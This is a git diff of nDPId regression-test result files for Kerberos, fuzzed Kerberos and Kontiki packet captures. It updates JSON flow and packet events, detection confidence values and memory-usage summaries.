+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":477,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -189,7 +185,7 @@ 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-payload-len":24133,"total-not-detected-flows":2,"total-guessed-flows":23,"total-detected-flows":11,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":36,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":192,"global_ts_msec":1549337952283} +00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-payload-len":24133,"total-not-detected-flows":2,"total-guessed-flows":23,"total-detected-flows":11,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":36,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":188,"global_ts_msec":1549337952283} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 77/77 ~~ skipped flows.............: 0 @@ -198,9 +194,9 @@ ~~ total active/idle flows...: 36/36 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5959976 bytes -~~ total memory freed........: 5959976 bytes -~~ total allocations/frees...: 118356/118356 +~~ total memory allocated....: 6093610 bytes +~~ total memory freed........: 6093610 bytes +~~ total allocations/frees...: 121118/121118 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2423 chars diff --git a/test/results/kerberos_fuzz.pcapng.out b/test/results/kerberos_fuzz.pcapng.out index 75e1eb2cf..815c960b9 100644 --- a/test/results/kerberos_fuzz.pcapng.out 
+++ b/test/results/kerberos_fuzz.pcapng.out 
@@ -2,7 +2,7 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1633884084000} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} 00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":288,"pkt_l4_len":268,"thread_ts_msec":1633884084000,"pkt":"RSYBIAFKAAAABn0BfgQBABMAAAAAWNGOAAAAAAAAAQAgAQAAAAAAAGZfRk9VTgAGA0QNChsbGxsbGxsbGxsbJwYGBgYGBgYGBhsbG10bGwYGBgYGBgYGBg0K\/\/\/\/\/05NRWGMG2VyMUnz8\/NDQQEAAAAAAABdKgC3MFD\/AAAAAABfAAAAAAAAAEVhjGlkO\/\/\/\/\/\/\/b2VyWQAAAAAAAABNRQAAAAAAAAAAAAAAAAAAAAAATUxAU0m3MFCjL1MuMlQg80NBTk1FYYxpZDsNCv\/\/\/\/9OTUVhjBtlcjFJ8\/P\/\/\/\/\/AAAAAAAAXSoAtzBQoy9TLkFOTUVhjGlkOw0K\/\/\/\/\/zsNCv\/\/\/\/8vUy4yVEFUIPNDQU5NRWGMaWQ7DQr\/\/\/\/\/"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}} 
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":260,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1633884084000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 813 chars diff --git a/test/results/kontiki.pcap.out b/test/results/kontiki.pcap.out index a865e634b..20dd90902 100644 --- a/test/results/kontiki.pcap.out +++ b/test/results/kontiki.pcap.out 
@@ -6,40 +6,40 @@ 00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1213662198289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1213662198289,"pkt":"AAAMB6wIABVYKKDoCABFAAFTD48AACARip0KGSA7QMiUUk3sB5wBPyUCAgUEALiJxyqdfRurkGvxcQAAAAHGclB+GpXQo7ilG\/X+QBPHZNzcc2Vgl8HXEWakCXkI\/uj8lmIl1eBkbhN4MvAcq86Z98N3bIP98eTWEBdQEYXavGuDSMiGARvJZed\/c1zWfWkiBQDMPgD+Ih+\/PJjSy0mU1LUYMuUE02zzTShWQfCvM2Xa9SOg6ec0xfxrP6bVssVjaXJqz1AT6v7o8NtJtnsERCco1F8aGfNVg8yXB5v\/LbWp1E2sz6l3Uqjqcfx5ZJSkZLl83RIr7uaKcsAZozQEdGaeqFqM+vh1lG8CYU5v3cUXR+iWSzTqhorAV8WhTpNJoFMNHVApj2b53cJQug6cwf67kqgCY5\/UQxlKUrAgIAb+T+C6ITKs8wNPNWZJmf3s1l4sH4nkFe9HNSIG47QjMrQ="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1213662198289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1213662198289,"pkt":"AAAMB6wIABVYKKDoCABFAAAgD5AAAAIRqcsKGSA7QMiUVk3sIrgADIy+AgEBAA=="} 
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} 
00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1213662198289,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213662198289,"pkt":"ABVYKKDoANAreRD8CABFwAA8nDwAAP4B8kgKGfkOChkgOwsA9I8AAAAARQAAIA+QAAABEarLChkgO0DIlFZN7CK4AAyMvgIBAQA="} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.304229} 
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.304229} 00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1213662198292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1213662198292,"pkt":"ABVYKKDoANAreRD8CABFAADuAABAADQRRpFAyJRSChkgOwecTewA2iL0AgUEADrI\/CCQa\/FynX0bqwAAAAEU3Ww9OKrYuWJ\/RoFyF3QkawgIztP7rZEqNEZAvKFqVsbVX6Q7o7C1GOOdgQ95sj8arDoplqug4W5ycMyrjvQQyOwCiAR\/6y2A+p1htTIZLrGyKHiEi2Jp9hwzPzovQAePahwaDoff8ISW08I83wX6VJuH0Ja\/8FiWxNnH+Ai3SlJjJhuk49id1Yw4mSXZ8jvVv5UwGXcIGiI6B0mhLZ+A10L6EpKDfeBwW1y7ll9X6Tp66XFf4oxdv3GVbO9k"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1213662198298,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1213662198298,"pkt":"AAAMB6wIABVYKKDoCABFAAAwD5EAACARi7gKGSA7QMiUWE3sAFAAHNz5AgUCAE9LWIs\/euHNAAAE5AIEAQA="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Kontiki","breed":"Potentially 
Dangerous","category":"Media"}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1213662198298,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662198298,"pkt":"ABVYKKDoANABJAf8CABFAAA4wMIAAP8BppIKGSADChkgOwMN0aAAAAAARQAAMA+RAAAfEYy4ChkgO0DIlFhN7ABQABzc+Q=="} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434} 
+00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1213662198301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1213662198301,"pkt":"AAAMB6wIABVYKKDoCABFAAAsD5IAACARi8EKGSA7QMiUUk3sB5wAGMoHAgQkALiJxyqdfRurkGvxcg=="} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1213662198488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1213662198488,"pkt":"AAAMB6wIABVYKKDoCABFAAAgD5cAAAQRp8QKGSA7QMiUVk3sIrgADIy+AgEBAA=="} 
00549{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198488,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1213662198488,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662198488,"pkt":"ABVYKKDoANAreRD8CABFwAA4pIcAAPwBJOPYqPGdChkgOwsADhsAAAAARQAAIA+XAAABEarEChkgO0DIlFZN7CK4AAx2NA=="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198488,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198488,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 